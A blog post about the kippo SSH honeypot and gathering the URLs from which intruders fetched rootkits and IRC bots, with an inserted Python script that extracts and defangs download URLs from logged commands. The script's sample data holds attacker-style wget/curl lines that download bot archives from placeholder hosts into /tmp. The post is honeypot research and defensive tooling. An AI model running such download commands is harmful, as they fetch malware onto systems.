On the 23rd of July I started with the SSH honeypot kippo. So after a good two months I decided to collect all the URLs/locations those “1337 h4x0rs” are wgetting all their files from.
(rootkits/ircbots/scanners)
I came up with the following list:

Now, I am not saying that these sites are “evil”. Chances are most likely that they are compromised themselves. So, just simply putting them on a blacklist isn't a good idea.

Some of these links contain open directories, including all sorts of files, while other sites simply may have disappeared into thin air. It's purely a list I extracted from the database my kippo is writing its results to.
As kippo also stores the obtained files, I have a copy of every single one of them for further analysis.
Use this information and/or containing files at your own risk.

Kippo also keeps track of every typed command in every “session”.

One particular session I found too funny not to share:


http://www.youtube.com/watch?v=FwZCWcfwzZ0


Thanks to Justin Elze, for helping me out with the video.
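A list like the one described above can be rebuilt from the commands the honeypot logs per session. The following is an added example, not the author's or kippo's own code: it pulls download URLs out of typed command lines and defangs them before sharing. The row shape (session id, typed command), the function names and the sample hosts are assumptions constructed for illustration, and the curl handling goes beyond the wget case the post mentions.

```python
import re
import shlex
from urllib.parse import urlsplit

# Constructed sample rows: (session id, command line typed in that session).
SAMPLE_ROWS = [
    ("s1", "cd /tmp; wget http://files.example.com/a/bot.tgz; tar xzf bot.tgz"),
    ("s2", "wget -q ftp://192.0.2.10/scan.tar.gz && tar xzf scan.tar.gz"),
    ("s3", "curl -O http://files.example.com/a/bot.tgz"),
    ("s3", "wget mirror.example.net/psy.tar"),
]
# Options that consume the next word, so that word is not a URL.
VALUE_OPTS = {"wget": {"-O", "-o", "-P", "-U", "-t", "-T"},
              "curl": {"-o", "-A", "-e", "-u", "-x"}}
SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")  # naive: ignores quoting

def extract_urls(command):
    urls = []
    for part in SEPARATORS.split(command):
        try:
            words = shlex.split(part)
        except ValueError:               # unbalanced quotes in the typed line
            words = part.split()
        if not words or words[0] not in VALUE_OPTS:
            continue                     # not a wget/curl invocation
        skip = False
        for word in words[1:]:
            if skip or word in VALUE_OPTS[words[0]]:
                skip = not skip          # option seen, or its value consumed
            elif not word.startswith("-"):
                url = word if "://" in word else "http://" + word
                try:
                    host = urlsplit(url).hostname
                except ValueError:       # e.g. malformed bracketed host
                    host = None
                if host and "." in host:
                    urls.append(url)
    return urls

def defang(url):
    # Non-clickable form for sharing: hxxp scheme, [.] in the host part.
    p = urlsplit(url)
    rest = url[len(p.scheme) + 3 + len(p.netloc):]
    return f"{p.scheme.replace('tt', 'xx')}://{p.netloc.replace('.', '[.]')}{rest}"

def download_sources(rows):
    # Map each defanged URL to the sorted session ids that fetched it.
    seen = {}
    for session, command in rows:
        for url in extract_urls(command):
            seen.setdefault(defang(url), set()).add(session)
    return {url: sorted(ids) for url, ids in sorted(seen.items())}
```

Grouping by URL shows which download locations are reused across sessions, which is more useful for triage than a flat list.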


Comment by Ken Pryor on October 4, 2010 at 11:08am
This was great fun to watch and good info too. Thanks Leon! I may have to give Kippo a try since I'm not having much luck attracting what I want with dionaea.
Comment by Jayson E. Street on September 28, 2010 at 7:55am
